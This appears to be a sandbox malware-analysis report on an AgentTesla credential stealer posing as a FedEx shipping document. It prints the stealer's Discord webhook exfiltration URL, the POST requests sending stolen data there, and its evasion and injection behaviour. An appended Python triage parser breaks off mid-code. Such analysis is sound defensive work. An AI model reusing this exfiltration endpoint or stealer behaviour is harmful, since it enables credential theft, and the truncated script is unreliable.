
Windows Analysis Report
FeDex_shipping_document.exe

Overview

General Information

Sample Name: FeDex_shipping_document.exe
Analysis ID: 830454
MD5: 5cf87a160007a5e6c7a4d24e1d831327
SHA1: e11d7467bc961d5ff16c3541200be1ad5083cefa
SHA256: 91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
Tags: AgentTesla, exe, FedEx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • FeDex_shipping_document.exe (PID: 5300 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
    • FeDex_shipping_document.exe (PID: 3628 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
  • cleanup

Malware Configuration Extractor: AgentTesla
{"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}

Yara
Source | Rule | Description | Author | Strings
00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: FeDex_shipping_document.exe PID: 3628 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: FeDex_shipping_document.exe PID: 3628 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Sigma
No Sigma rule has matched

Snort IDS alert
Timestamp: 03/20/23-11:52:05.074477
Source IP: 192.168.2.7
Destination IP: 162.159.138.232
Source Port: 49701
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: FeDex_shipping_document.exe | ReversingLabs: Detection: 38%
Source: FeDex_shipping_document.exe | Virustotal: Detection: 34%
Source: FeDex_shipping_document.exe | Joe Sandbox ML: detected
Source: 0.2.FeDex_shipping_document.exe.4549c80.9.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}
Source: FeDex_shipping_document.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: FeDex_shipping_document.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: nlsY.pdb source: FeDex_shipping_document.exe
Source: Binary string: nlsY.pdbSHA256 source: FeDex_shipping_document.exe

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49701 -> 162.159.138.232:443
Source: unknown | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 162.159.138.232
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
  Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1ed
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: discord.com
  Content-Length: 1217
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
  Content-Type: multipart/form-data; boundary=----------8b7e5ceedd2047309d0db2508590a0cd
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: discord.com
  Content-Length: 2002
  Expect: 100-continue
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com4
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.comD8
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20
Source: unknown | HTTP traffic detected:
  POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
  Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1ed
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: discord.com
  Content-Length: 1217
  Expect: 100-continue
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.ipify.org

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AA1ED8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,00000000
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: initial sample | Static PE information: Filename: FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184C844
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184F1E8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184F1F8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AA0B80
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AAF0D8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AAA660
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C9C560
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C91CA4
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C98978
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C92B80
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C92B70
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C9CB21
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C93950
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E3DD30
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E326C0
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E3168A
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E3AEA8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E33FE0
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E31DF7
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E388F8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E37920
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_070D136B
Source: FeDex_shipping_document.exe, 00000000.00000000.247629334.0000000000F28000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.000000000451B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.273598775.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.00000000041B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.0000000003287000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000001.00000002.515103370.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000001.00000002.515787794.0000000000F38000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe | Binary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FeDex_shipping_document.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@4/3
Source: FeDex_shipping_document.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: FeDex_shipping_document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FeDex_shipping_document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184CB36 pushfd ; ret 0_2_0184CB39
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AAD532 push es; ret 1_2_06AAD540
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_070D1360 pushfd ; retf 1_2_070D1369
Source: initial sample | Static PE information: section name: .text entropy: 7.872797130775443
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | TID: 5296 | Thread sleep time: -40023s >= -30000s
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | TID: 5588 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | TID: 5852 | Thread sleep count: 9470 > 30
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | TID: 6104 | Thread sleep time, 50 events, each matched against the -30000s threshold: -13835058055282155, -1200000, -1199750, -1199609, -1199484, -1199356, -1199203, -1199062, -1198943, -1198797, -1198641, -1198495, -1198340, -1198199, -1197797, -1197594, -1197453, -1197296, -1197146, -1197017, -1196889, -1196770, -1196650, -1196530, -1196426, -1196299, -1196145, -1196018, -1195896, -1195760, -1195640, -1195535, -1195348, -1195192, -1195005, -1194848, -1194692, -1194557, -1194442, -1194302, -1194182, -1194066, -1193928, -1193798, -1193634, -1193517, -1193401, -1193286, -1193145, -1193005
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Thread delayed: delay time, 51 events: 922337203685477, 922337203685477, 1200000, 1199750, 1199609, 1199484, 1199356, 1199203, 1199062, 1198943, 1198797, 1198641, 1198495, 1198340, 1198199, 1197797, 1197594, 1197453, 1197296, 1197146, 1197017, 1196889, 1196770, 1196650, 1196530, 1196426, 1196299, 1196145, 1196018, 1195896, 1195760, 1195640, 1195535, 1195348, 1195192, 1195005, 1194848, 1194692, 1194557, 1194442, 1194302, 1194182, 1194066, 1193928, 1193798, 1193634, 1193517, 1193401, 1193286, 1193145, 1193005
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Window / User API: threadDelayed 9470
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Thread delayed: delay time, 52 events: 40023, 922337203685477, 922337203685477, 1200000, 1199750, 1199609, 1199484, 1199356, 1199203, 1199062, 1198943, 1198797, 1198641, 1198495, 1198340, 1198199, 1197797, 1197594, 1197453, 1197296, 1197146, 1197017, 1196889, 1196770, 1196650, 1196530, 1196426, 1196299, 1196145, 1196018, 1195896, 1195760, 1195640, 1195535, 1195348, 1195192, 1195005, 1194848, 1194692, 1194557, 1194442, 1194302, 1194182, 1194066, 1193928, 1193798, 1193634, 1193517, 1193401, 1193286, 1193145, 1193005
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Memory written: C:\Users\user\Desktop\FeDex_shipping_document.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
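The evasion and injection evidence above (VM-fingerprinting WMI classes, the long and effectively infinite sleeps, the decrementing sleep loop, SeDebugPrivilege, and a PE header written at base 0x400000 into a freshly spawned copy of the sample) can be turned into explicit findings by a small triage pass over the behaviour lines. The following is an added example and is not part of the Joe Sandbox report or its tooling. It assumes the sandbox prints delays in milliseconds (consistent with the report's own ">= 3 min" signature and its 30000 threshold), that image paths in "Process created" lines contain no spaces, and it uses constructed input copied from a subset of the lines above:

```python
# Added example, not part of the Joe Sandbox report or its tooling: a triage pass
# over behaviour lines in the form shown above. Assumptions are marked below.
import re

# Constructed input: a handful of the report's own lines. The parser accepts both
# the "|"-separated form and the page's fused form ("...exeThread delayed: ...")
# and tolerates the "Jump to behavior" link residue.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | TID: 5296 | Thread sleep time: -40023s >= -30000s
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | TID: 5588 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\FeDex_shipping_document.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Thread delayed: delay time: 1200000
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Thread delayed: delay time: 1199750
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Thread delayed: delay time: 1199609
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Thread delayed: delay time: 1199484
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Thread delayed: delay time: 1199356
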